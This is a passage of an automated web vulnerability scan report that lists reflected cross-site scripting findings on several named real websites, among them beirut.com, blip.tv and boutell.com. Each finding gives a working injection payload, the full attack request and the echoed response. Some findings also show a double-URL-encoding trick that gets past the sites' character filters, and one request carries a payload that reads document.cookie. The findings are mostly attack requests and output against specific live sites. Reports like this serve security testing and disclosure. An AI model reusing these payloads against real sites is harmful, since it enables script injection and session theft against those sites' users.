Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=17jkapsd34tdtfv9m4mr30gs23

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 02:33:02 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Index';
var initfacebox='';
var contactid='c21a0';alert(1)//6ac55102261';
var showfacebox='';
</script>
...[SNIP]...

4.1161. http://www.beirut.com/css/purple/images/site-bottom.png [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/css/purple/images/site-bottom.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5dfe9%2527%253balert%25281%2529%252f%252fd25ec58cd34 was submitted in the REST URL parameter 3. This input was echoed as 5dfe9';alert(1)//d25ec58cd34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/purple/5dfe9%2527%253balert%25281%2529%252f%252fd25ec58cd34/site-bottom.png HTTP/1.1
Host: www.beirut.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=17jkapsd34tdtfv9m4mr30gs23

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 02:33:12 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Index';
var initfacebox='';
var contactid='5dfe9';alert(1)//d25ec58cd34';
var showfacebox='';
</script>
...[SNIP]...

4.1162. http://www.beirut.com/css/purple/images/site-cnt.png [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/css/purple/images/site-cnt.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 310fd%2527%253balert%25281%2529%252f%252f6d9de9b9ba5 was submitted in the REST URL parameter 3. This input was echoed as 310fd';alert(1)//6d9de9b9ba5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/purple/310fd%2527%253balert%25281%2529%252f%252f6d9de9b9ba5/site-cnt.png HTTP/1.1
Host: www.beirut.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=17jkapsd34tdtfv9m4mr30gs23

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 02:33:37 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Index';
var initfacebox='';
var contactid='310fd';alert(1)//6d9de9b9ba5';
var showfacebox='';
</script>
...[SNIP]...

4.1163. http://www.beirut.com/css/purple/images/site-top.png [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/css/purple/images/site-top.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19afb%2527%253balert%25281%2529%252f%252facb23f911c6 was submitted in the REST URL parameter 3. This input was echoed as 19afb';alert(1)//acb23f911c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/purple/19afb%2527%253balert%25281%2529%252f%252facb23f911c6/site-top.png HTTP/1.1
Host: www.beirut.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=17jkapsd34tdtfv9m4mr30gs23

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 02:33:55 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Index';
var initfacebox='';
var contactid='19afb';alert(1)//acb23f911c6';
var showfacebox='';
</script>
...[SNIP]...

4.1164. http://www.beirut.com/images/Beirut.com.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/images/Beirut.com.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82348'-alert(1)-'5df98ca5207 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /82348'-alert(1)-'5df98ca5207/Beirut.com.png HTTP/1.1
Host: www.beirut.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=17jkapsd34tdtfv9m4mr30gs23

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:23:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept
Content-Type: text/html; charset=UTF-8
Content-Length: 45037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='82348'-alert(1)-'5df98ca5207';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1165. http://www.beirut.com/twitter [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/twitter

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 350a5"><a>f49b61db3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /twitter350a5"><a>f49b61db3c HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:26:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_footer" rel="facebox" href="/submitaListing.php?randstyle=magenta&indexpage=twitter350a5"><a>f49b61db3c&listingtype=twitter.php&Types=">
...[SNIP]...

4.1166. http://www.beirut.com/twitter [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/twitter

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68e96'-alert(1)-'495919bd68e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /twitter68e96'-alert(1)-'495919bd68e HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:31:44 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64475

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='twitter68e96'-alert(1)-'495919bd68e';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1167. http://www.beneteaucountdown.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beneteaucountdown.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c06cc"><script>alert(1)</script>74390de796f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c06cc\"><script>alert(1)</script>74390de796f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c06cc"><script>alert(1)</script>74390de796f=1 HTTP/1.1
Host: www.beneteaucountdown.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:12:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=d522a64ff7164ef426aa4dd2ee10c3d4; path=/
Expires:
Cache-Control:
Pragma:
Set-Cookie: BBF_Login=deleted; expires=Mon, 25-Jan-2010 13:12:53 GMT
Connection: close
Content-Type: text/html; charset=windows-1252
Content-Length: 21898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<form name="BrochureRequest" action="index.php?c06cc\"><script>alert(1)</script>74390de796f=1&ccsForm=BrochureRequest" method="post">
...[SNIP]...

4.1168. http://www.blip.tv/posts [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.blip.tv
Path:	/posts

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33eee'%3balert(1)//bfd09d4ad71 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 33eee';alert(1)//bfd09d4ad71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /posts?33eee'%3balert(1)//bfd09d4ad71=1 HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:59 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:59 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 52451
Date: Tue, 25 Jan 2011 13:13:59 GMT
X-Varnish: 2104821284
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
<script type="text/javascript">


                       window.rss_feed_url = 'http://blip.tv/rss?sort=popularity;page=1;date=dayago;33eee';alert(1)//bfd09d4ad71=1;category=;s=posts';
           window.generic_feed_uri = 'sort=popularity;page=1;date=dayago;33eee\';alert(1)//bfd09d4ad71=1;category=;s=posts';


   </script>
...[SNIP]...

4.1169. http://www.blip.tv/posts [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.blip.tv
Path:	/posts

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 106dd"><script>alert(1)</script>fca98f32eb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /posts?106dd"><script>alert(1)</script>fca98f32eb9=1 HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:52 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:52 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 52592
Date: Tue, 25 Jan 2011 13:13:51 GMT
X-Varnish: 1652155154
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<a href="/?106dd"><script>alert(1)</script>fca98f32eb9=1;sort=popularity;date=dayago;category=;s=posts;page=2">
...[SNIP]...

4.1170. http://www.blip.tv/posts/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.blip.tv
Path:	/posts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73be9"><script>alert(1)</script>34c636ed8b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /posts/?73be9"><script>alert(1)</script>34c636ed8b6=1 HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:37 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:37 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 52337
Date: Tue, 25 Jan 2011 13:13:37 GMT
X-Varnish: 809223008
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<a href="/?73be9"><script>alert(1)</script>34c636ed8b6=1;sort=popularity;date=dayago;category=;s=posts;page=2">
...[SNIP]...

4.1171. http://www.blip.tv/posts/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.blip.tv
Path:	/posts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2098b'%3balert(1)//8bdeb242a10 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2098b';alert(1)//8bdeb242a10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /posts/?2098b'%3balert(1)//8bdeb242a10=1 HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:49 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:49 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 52451
Date: Tue, 25 Jan 2011 13:13:49 GMT
X-Varnish: 280784971
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
<script type="text/javascript">


                       window.rss_feed_url = 'http://blip.tv/rss?sort=popularity;2098b';alert(1)//8bdeb242a10=1;page=1;date=dayago;category=;s=posts';
           window.generic_feed_uri = 'sort=popularity;2098b\';alert(1)//8bdeb242a10=1;page=1;date=dayago;category=;s=posts';


   </script>
...[SNIP]...

4.1172. http://www.blip.tv/users [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.blip.tv
Path:	/users

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a9ae"><script>alert(1)</script>78c3b3600ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /users?7a9ae"><script>alert(1)</script>78c3b3600ff=1 HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:57 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:57 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 36112
Date: Tue, 25 Jan 2011 13:13:58 GMT
X-Varnish: 809224406
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<a href="/?7a9ae"><script>alert(1)</script>78c3b3600ff=1;sort=views;pagelen=10;s=users;page=2">
...[SNIP]...

4.1173. http://www.blip.tv/users/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.blip.tv
Path:	/users/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9199f"><script>alert(1)</script>3ecd1a1aa40 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /users/?9199f"><script>alert(1)</script>3ecd1a1aa40=1 HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:14:01 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:14:01 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 36112
Date: Tue, 25 Jan 2011 13:14:02 GMT
X-Varnish: 809224607
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<a href="/?sort=views;9199f"><script>alert(1)</script>3ecd1a1aa40=1;pagelen=10;s=users;page=2">
...[SNIP]...

4.1174. http://www.boutell.com/lsm/lsmbyid.cgi/002057/x22 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.boutell.com
Path:	/lsm/lsmbyid.cgi/002057/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65012"><script>alert(1)</script>13d1a3fff3b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lsm/lsmbyid.cgi/00205765012"><script>alert(1)</script>13d1a3fff3b/x22 HTTP/1.1
Host: www.boutell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:39 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7886

<title>Linux Software Map: Error</title>
<link href="/main.css" rel="stylesheet" type="text/css">

<body>
<script type="text/javascript">

var _gaq = _gaq || [];
_gaq.pus
...[SNIP]...
<a class="lmenu" href="/cgi-bin/printable.cgi?url=http://www.boutell.com/lsm/lsmbyid.cgi/00205765012"><script>alert(1)</script>13d1a3fff3b/x22">
...[SNIP]...

4.1175. http://www.boutell.com/lsm/lsmbyid.cgi/002057/x22 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.boutell.com
Path:	/lsm/lsmbyid.cgi/002057/x22

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eef8e"><script>alert(1)</script>89c9b41b94b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lsm/lsmbyid.cgi/002057/x22eef8e"><script>alert(1)</script>89c9b41b94b HTTP/1.1
Host: www.boutell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:40 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7886

<title>Linux Software Map: Error</title>
<link href="/main.css" rel="stylesheet" type="text/css">

<body>
<script type="text/javascript">

var _gaq = _gaq || [];
_gaq.pus
...[SNIP]...
<a class="lmenu" href="/cgi-bin/printable.cgi?url=http://www.boutell.com/lsm/lsmbyid.cgi/002057/x22eef8e"><script>alert(1)</script>89c9b41b94b">
...[SNIP]...

4.1176. http://www.boutell.com/lsm/lsmbyid.cgi/002057/x22 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.boutell.com
Path:	/lsm/lsmbyid.cgi/002057/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fffc0"><script>alert(1)</script>e04eff45495 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lsm/lsmbyid.cgi/002057/x22?fffc0"><script>alert(1)</script>e04eff45495=1 HTTP/1.1
Host: www.boutell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:36 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
